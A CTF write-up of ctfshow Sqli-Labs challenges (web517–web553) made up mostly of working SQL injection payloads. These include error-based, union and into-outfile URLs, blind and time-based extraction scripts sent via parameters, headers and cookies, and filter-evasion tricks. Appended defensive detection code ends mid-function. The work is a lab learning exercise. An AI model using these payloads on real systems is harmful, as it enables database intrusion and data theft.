[ctfshow] Web: Sqli-Labs writeup

Preface

Recording writeups for the web challenges; getting stronger bit by bit, forging the sword.

Sqli-labs

web517

Enumerate all databases: ctfshow

http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select group_concat(schema_name) from information_schema.schemata)),1)%23

Enumerate tables

http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables)),1)%23

Enumerate columns

http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)%23

Get the flag

http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select flag from ctfshow.flag)),1)%23

Right half of the flag

http://be06e080-6339-4df1-a948-65e99ae476c2.challenge.ctf.show:8080/?id=1' and updatexml(1,concat(0x3d,(select right(flag,20) from ctfshow.flag)),1)%23

Final flag, with the overlapping part removed:

ctfshow{f5748827-3058-4686-9127-957897bde966}

web518

Database ctfshow, table flagaa, column flagac

id=1  and updatexml(1,concat(0x3d,(select flagac from ctfshow.flagaa)),1)
id=1  and updatexml(1,concat(0x3d,(select right(flagac,20) from ctfshow.flagaa)),1)

web519

Add a parenthesis to the closing.

Tables: flagaanec

http://5795e828-f1e9-416c-83b6-fc0609f0dc8e.challenge.ctf.show:8080/?id=1') and updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables)),1)%23

Columns: flagaca

Get the flag

http://5795e828-f1e9-416c-83b6-fc0609f0dc8e.challenge.ctf.show:8080/?id=1') and updatexml(1,concat(0x3d,(select flagaca from ctfshow.flagaanec)),1) --+

Right half

http://5795e828-f1e9-416c-83b6-fc0609f0dc8e.challenge.ctf.show:8080/?id=1') and updatexml(1,concat(0x3d,(select right(flagaca,20) from ctfshow.flagaanec)),1) --+

web520

Closed with a double quote plus ), same procedure; table flagsf.

http://460c46d4-97df-421f-9f8c-95d6e335f87b.challenge.ctf.show:8080/?id=1") and updatexml(1,concat(0x3d,(select flag23 from ctfshow.flagsf)),1) %23

web521

Now the blind injection challenges start; here is a simple binary-search blind injection script.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://60390dcc-8ebb-4288-97c6-80258e15c409.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpuck'"
# -------- flag
sql= "select flag33 from ctfshow.flagpuck"
#*************************************************************************************************************************************************************
payload = "?id=1' and if(ascii(substr(({}),{},1))>'{}',1,0)%23"
i = 0

for i in range(1,100):
    # binary search over ASCII 32..127 for character i of the query result
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! result is {}'.format(flag))
        break

web522

The closing has changed to a double quote; adjust the code above.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://5eba9ea8-340b-4668-8e0f-5baf9c16e130.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpa'"
# -------- flag
sql= "select flag3a3 from ctfshow.flagpa"
#*************************************************************************************************************************************************************
payload = '?id=1" and if(ascii(substr(({}),{},1))>"{}",1,0)%23'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web523

The hint says to use outfile, but blind injection works too; two payloads are given. Note the double-parenthesis closing.

Manual injection

http://37bffc8b-7509-49ac-8746-d650a9b5de8f.challenge.ctf.show:8080/?id=1')) union select 1,2,group_concat(flag43) from ctfshow.flagdk into outfile "/var/www/html/111.txt" %23

Blind injection script

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://37bffc8b-7509-49ac-8746-d650a9b5de8f.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagdk'"
# -------- flag
sql= "select flag43 from ctfshow.flagdk"
#*************************************************************************************************************************************************************
payload = "?id=1')) and if(ascii(substr(({}),{},1))>'{}',1,0)%23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web524

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://056b4af4-c1c0-4199-bd9a-9b7ea826fc1a.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagjugg'"
# -------- flag
sql= "select flag423 from ctfshow.flagjugg"
#*************************************************************************************************************************************************************
payload = "?id=1' and if(ascii(substr(({}),{},1))>'{}',1,0)%23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url_get)
        if "You are in" in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web525

Time-based blind injection

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://d5c8f01f-0c15-423a-b2d0-b32f84581a5b.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagug'"
# -------- flag
sql= "select flag4a23 from ctfshow.flagug"
#*************************************************************************************************************************************************************
payload = "?id=1' and if(ascii(substr(({}),{},1))>'{}',sleep(0.6),0) %23"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        try:
            # the request timing out means sleep() fired, i.e. the character is greater than mid
            res = requests.get(url=url_get, timeout=0.5)
            tail = mid
        except:
            head = mid + 1
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web526

The closing changes to double quotes.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests

url = "http://4889f924-f7aa-4338-87ec-d12adb999b0e.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagugs'"
# -------- flag
sql= "select flag43s from ctfshow.flagugs"
#*************************************************************************************************************************************************************
payload = '?id=1" and if(ascii(substr(({}),{},1))>"{}",sleep(0.6),0) %23'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        try:
            res = requests.get(url=url_get, timeout=0.5)
            tail = mid
        except:
            head = mid + 1
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web527

POST parameters

passwd=1&uname=1' union select 1,(select flag43s from ctfshow.flagugsd) #

web528

Changes to double quotes.

web529

Error-based injection

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select flag4 from ctfshow.flag)),1) %23

ctfshow{571f6255-96ec-4007-98d4

passwd=1&uname=1') or updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) %23

ctfshow{571f6255-96ec-4007-98d4-c1d8fdc4a34f}

web530

ctfshow{fe8d3ab8-7c4e-4f35-92c9
5-92c9-927b68c5e708}
ctfshow{fe8d3ab8-7c4e-4f35-92c9-927b68c5e708}

passwd=1&uname=1" or updatexml(1,concat(0x3d,(select right(group_concat(flag4s),20) from ctfshow.flagb)),1)  #

web531

Time-based blind injection through POST parameters; tweak the code and run it.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://73347aaf-bfb6-42f5-b067-4f280ab6dd4f.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagba'"
# -------- flag
sql= "select flag4sa from ctfshow.flagba"
#*************************************************************************************************************************************************************
payload = "1' or if(ascii(substr(({}),{},1))>'{}',sleep(0.1),1) #"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'uname': payload.format(sql,i,mid),
            'passwd':'1'
        }
        # measure the round trip: a slow response means sleep() fired for this row
        start = time.time()
        res = requests.post(url=url, data=data)
        end = time.time()
        print(end - start)
        if end-start > 1.4:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web532

Change the closing to a double quote plus a parenthesis.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://dcea8cdc-a6c5-40ad-9d08-ad98fb744785.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagbab'"
# -------- flag
sql= "select flag4sa from ctfshow.flagbab"
#*************************************************************************************************************************************************************
payload = '1") or if(ascii(substr(({}),{},1))>"{}",sleep(0.1),1) #'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'uname': payload.format(sql,i,mid),
            'passwd':'1'
        }
        start = time.time()
        res = requests.post(url=url, data=data)
        end = time.time()
        print(end - start)
        if end-start > 1.4:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web533

uname=admin&passwd=1' or updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) #

ctfshow{03109730-de56-4be1-89cd
1-89cd-ad2c56b2665c}
ctfshow{03109730-de56-4be1-89cd-ad2c56b2665c}

web534

Simple error-based injection; I wrote a script for it to learn how to set headers.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://dce29b55-ff5f-4e47-a361-8f1cb2fa6b27.challenge.ctf.show:8080"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
# -------- flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "'and updatexml(1,concat(0x3d,({})),1),1)#"

# the payload is delivered in the User-Agent header
headers = {
    "User-Agent" : payload.format(sql)
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web535

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://6385c207-f30c-41ee-9767-bbfa5b90f2b5.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
# -------- flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "'and updatexml(1,concat(0x3d,({})),1),1)#"

headers = {
    #"User-Agent" : payload.format(sql)
    'Referer': payload.format(sql)
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web536

I finished this one but forgot to paste it; the listing below is the next challenge's payload, which is essentially the same thing, just with the base64 encoding removed.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
import base64

url = "http://7ee17c1d-22b6-4e22-b969-4d2e06d73041.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
# -------- flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************

# the payload is delivered base64-encoded in the uname cookie
headers = {
    #"User-Agent" : payload.format(sql)
    #'Referer': payload.format(sql)
    'Cookie' : 'uname=' + base64.b64encode(f"admin') and updatexml(1,concat(0x3d,({sql})),1) #".encode()).decode()
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web537

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
import base64

url = "http://7ee17c1d-22b6-4e22-b969-4d2e06d73041.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
# -------- flag
sql= "select right(flag4,20) from ctfshow.flag"
#*************************************************************************************************************************************************************

headers = {
    #"User-Agent" : payload.format(sql)
    #'Referer': payload.format(sql)
    'Cookie' : 'uname=' + base64.b64encode(f"admin') and updatexml(1,concat(0x3d,({sql})),1) #".encode()).decode()
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web538

The closing becomes a double quote.

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time
import base64

url = "http://226925d4-af60-4fd1-a5ea-ca56cec0368e.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
# -------- flag
sql= "select flag4 from ctfshow.flag"
#*************************************************************************************************************************************************************

headers = {
    #"User-Agent" : payload.format(sql)
    #'Referer': payload.format(sql)
    'Cookie' : 'uname=' + base64.b64encode(f'admin" and updatexml(1,concat(0x3d,({sql})),1) #'.encode()).decode()
}

data = {
    'uname' : 'admin',
    'passwd' : 'admin'
}

res = requests.post(url, data = data, headers = headers)
print(res.text)

web539

http://64dcaaed-8f7c-491e-9b4c-8ebb54ae8374.challenge.ctf.show:8080/?id=1.1' or  updatexml(1,concat(0x3d,(select right(flag4,20) from ctfshow.flag)),1) and '1'='1

web540

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time


flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="select group_concat(schema_name) from information_schema.schemata"
# -------- tables
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
# -------- columns
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
# -------- flag
sql= "select flag4 from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "admin' and if(ascii(substr(({}),{},1))>'{}',sleep(0.4),0)#"
i = 0

session = requests.session()
for i in range(1,666):
    head = 32
    tail = 127

    while head < tail:
        mid = (head+tail) >> 1
        # second-order injection: register the payload as a username, log in with it,
        # then time the password change, which is where the stored name is used
        url_register = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login_create.php"
        data = {
            'username' : payload.format(sql,i,mid),
            'password' : '22',
            're_password' : '22',
            'submit' : 'Register'
        }
        res = session.post(url=url_register,data=data)


        url_login = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login.php"
        data = {
            'login_user' : payload.format(sql,i,mid),
            'login_password' : '22',
            'mysubmit' : 'Login'
        }
        res = session.post(url=url_login, data=data)

        url_change = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/pass_change.php"
        data = {
            'current_password' : '22',
            'password' : '1',
            're_password' : '1',
            'submit' : 'Reset'
        }
        start = time.time()
        res = session.post(url=url_change, data=data)
        end = time.time()
        print(end - start)
        if end-start > 0.4 and end-start < 1:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web541

http://d0b25a37-1ec0-488a-88ea-c4a6f2d780a2.challenge.ctf.show:8080/?id=1' || updatexml(1,concat(0x3d,(select group_concat(flag4s) from ctfshow.flags )),1)%23

web542

http://11917581-19a3-4e00-83bf-7d5dd5e7a4d3.challenge.ctf.show:8080/?id=1.1 union select 1,2,(select group_concat(flag4s) from ctfshow.flags)

web543

Basically every character that could serve as a space is filtered.

For spaces there are quite a few alternatives:

%09 TAB (horizontal)

%0a newline

%0c form feed

%0d carriage return

%0b TAB (vertical)

%a0 space

Error-based injection

Tables

http://85e19e80-5430-40a0-8004-b63040436341.challenge.ctf.show:8080/?id=1'||updatexml(1,concat(0x3d,(select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`='ctfshow')),1)||'1'='1

Columns

http://85e19e80-5430-40a0-8004-b63040436341.challenge.ctf.show:8080/?id=1'||updatexml(1,concat(0x3d,(select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags')),1)||'1'='1

Then get the flag the same way.

web544

Boolean-based blind injection

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://537b3c06-bc22-41e1-a4c3-a65f72d1a4f9.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="database()"
# -------- tables
#sql= "select(group_concat(table_name))from(infoorrmation_schema.tables)where`table_schema`='ctfshow'"
# -------- columns
#sql= "select(group_concat(column_name))from(infoorrmation_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
# -------- flag
sql= "select`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?id=100')||if(ascii(substr(({}),{},1))>'{}',1,0)||('1'='0"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url=url_get)
        print(res.url)
        if 'Dumb' in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web545

select is filtered in both lowercase and uppercase, but mixed case is not, so error-based injection works directly.

http://6330b356-94f7-4772-a30b-5c077776fed2.challenge.ctf.show:8080/?id=0'%09or%09updatexml(1,concat(0x3d,(SelecT%09right(group_concat(flag4s),20)%09from%09ctfshow.`flags`)),1)%09or%09'1'='0
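As an added defensive example (not part of the original writeup): a small log analyser that undoes the evasions this page relies on before matching, namely the %09/%0a/%0b/%0c/%0d/%a0 whitespace substitutes listed under web543 and the mixed-case SelecT from web545, and that counts the per-client request bursts a binary-search script like the one under web521 produces. The log lines, client addresses, signature names and threshold are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Whitespace substitutes from the web543 list; each is folded to a plain space
# so the rule sees roughly the token stream the database will parse.
SPACE_SUBSTITUTES = {0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0xA0}

# Signatures matched against the normalised query string (constructed names).
SIGNATURES = {
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\("),  # web517, web529
    "blind_probe": re.compile(r"\bascii\s*\(\s*substr\s*\("),       # web521, web544
    "time_based":  re.compile(r"\bsleep\s*\("),                      # web525, web566
    "union":       re.compile(r"\bunion\s+select\b"),                # web523, web549
    "schema_enum": re.compile(r"information_schema\."),
}

# Apache combined-log shape: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def normalise(target: str) -> str:
    """Percent-decode, fold whitespace substitutes, case-fold and squeeze spaces."""
    raw = unquote_to_bytes(target)
    folded = bytes(0x20 if b in SPACE_SUBSTITUTES else b for b in raw)
    text = folded.decode("latin-1").lower()   # latin-1 never fails; only ASCII tokens matter
    return re.sub(r" +", " ", text)


def classify(target: str) -> list:
    """Names of the signatures that fire on one request target."""
    norm = normalise(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]


def analyse(log_text: str, probe_threshold: int = 5) -> dict:
    """Per-request findings plus the clients whose blind-probe count crosses the threshold.

    A binary search needs about seven probes per character, so a single client
    issuing many ascii(substr(...)) comparisons against one endpoint is the
    signal, even when each individual request looks harmless."""
    findings = []
    probes = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(3)
        hits = classify(target)
        if not hits:
            continue
        findings.append((client, target, hits))
        if "blind_probe" in hits:
            probes[client] += 1
    return {
        "findings": findings,
        "blind_probe_clients": {c: n for c, n in probes.items() if n >= probe_threshold},
    }


def _line(client: str, target: str) -> str:
    # Constructed sample log line, not from any real server.
    return f'{client} - - [10/Aug/2021:08:21:11 +0000] "GET {target} HTTP/1.1" 200 720'


# The mids a head=32/tail=127 binary search computes while resolving the byte 'k' (107).
PROBE_MIDS = [79, 103, 115, 109, 106, 108, 107]
PROBE = "/?id=1'%20and%20if(ascii(substr((select%20flag33%20from%20ctfshow.flagpuck),1,1))>'{}',1,0)%23"

SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", "/?id=1")]  # benign request
    + [_line("10.0.0.6", "/?id=0'%09or%09updatexml(1,concat(0x3d,(SelecT%09right(group_concat(flag4s),20)%09from%09ctfshow.`flags`)),1)%09or%09'1'='0")]
    + [_line("10.0.0.7", PROBE.format(mid)) for mid in PROBE_MIDS]
    + [_line("10.0.0.9", "/?sort=if(ascii(substr((SelecT`flag4s`from(ctfshow.flags)),1,1))>'79',sleep(0.05),0)")]
    + [_line("10.0.0.8", "/?id=1&id=1.1'%20union%20select%201,2,(select%20group_concat(flag4s)%20from%20ctfshow.flags)%20%23")]
)

if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for client, target, hits in report["findings"]:
        print(client, hits, target[:60])
    print("blind-probe clients:", report["blind_probe_clients"])
```

A filter that deletes keywords (the page's infoorrmation_schema trick) produces variants no keyword rule will match, which is one more reason to lean on the per-client probe count rather than on pattern matching alone.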

web546

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://efdac04a-9f0d-4023-8689-95c04fac6cdf.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="database()"
# -------- tables
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
# -------- columns
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
# -------- flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = '?id=100"%09or%09if(ascii(substr(({}),{},1))>"{}",1,0)%09or%09"1"="0'
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url=url_get)
        print(res.url)
        if 'Dumb' in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web547

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time

url = "http://ee1e575c-882c-4a99-ab79-d10bb4557986.challenge.ctf.show:8080/"
flag = ""
#*************************************************************************************************************************************************************
# -------- database names
#sql="database()"
# -------- tables
#sql= "SelecT(group_concat(table_name))from(information_schema.tables)where`table_schema`='ctfshow'"
# -------- columns
#sql= "SelecT(group_concat(column_name))from(information_schema.columns)where`table_schema`='ctfshow'||`table_name`='flags'"
# -------- flag
sql= "SelecT`flag4s`from(ctfshow.flags)"
#*************************************************************************************************************************************************************
payload = "?id=1.1')%09or%09if(ascii(substr(({}),{},1))>'{}',1,0)%09or%09('1'='0"
i = 0

for i in range(1,100):
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        url_get = url + payload.format(sql,i,mid)
        res = requests.get(url=url_get)
        print(res.url)
        if 'Dumb' in res.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

web548

Use the previous challenge's payload.

web549

http://fd8bb41c-9623-41d7-9b87-012ec43f801d.challenge.ctf.show:8080/?id=1&id=1.1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

web550

http://dcc7eabd-ecb6-4f83-a660-ce28ab3ba400.challenge.ctf.show:8080/?id=1&id=1.1" union select 1,2,(select group_concat(flag4s) from ctfshow.flags) #

web551

http://f69c9b47-4023-4f2f-8bf5-f9e3ab878748.challenge.ctf.show:8080/?id=1&id=1.1") union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web552

Wide-byte injection: find something that starts with %df, or just use %df directly. I use '汉' because its URL encoding is greater than %df, so it can combine with the escape character to bypass the escaping.

http://53c6d802-4048-4c38-ab11-b5d83535dc83.challenge.ctf.show:8080/?id=1.1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23

web553

http://ba8afb54-5cde-40e3-ab92-be77a22ec24f.challenge.ctf.show:8080/?id=1.1汉' union select 1,2,(select group_concat(flag4s) from ctfshow.flags)%23
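As an added example (not from the writeup) of why the wide-byte trick in web552/web553 works and what closes it: byte-level addslashes-style escaping inserts a 0x5C that a GBK connection then swallows into a double-byte character, leaving the quote live, whereas decoding the input strictly in the connection charset before escaping (the behaviour charset-aware escaping or a prepared statement gives you) rejects such input outright. The escape_bytes/escape_text/quotes_still_escaped helpers and the sample payload are constructed here.

```python
def escape_bytes(raw: bytes) -> bytes:
    """addslashes-style escaping applied to raw bytes, blind to the charset."""
    return raw.replace(b"\\", b"\\\\").replace(b"'", b"\\'").replace(b'"', b'\\"')


def quotes_still_escaped(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes the way a server using `charset` would and check
    that every quote character is still preceded by a backslash character."""
    text = escaped.decode(charset, errors="replace")
    for i, ch in enumerate(text):
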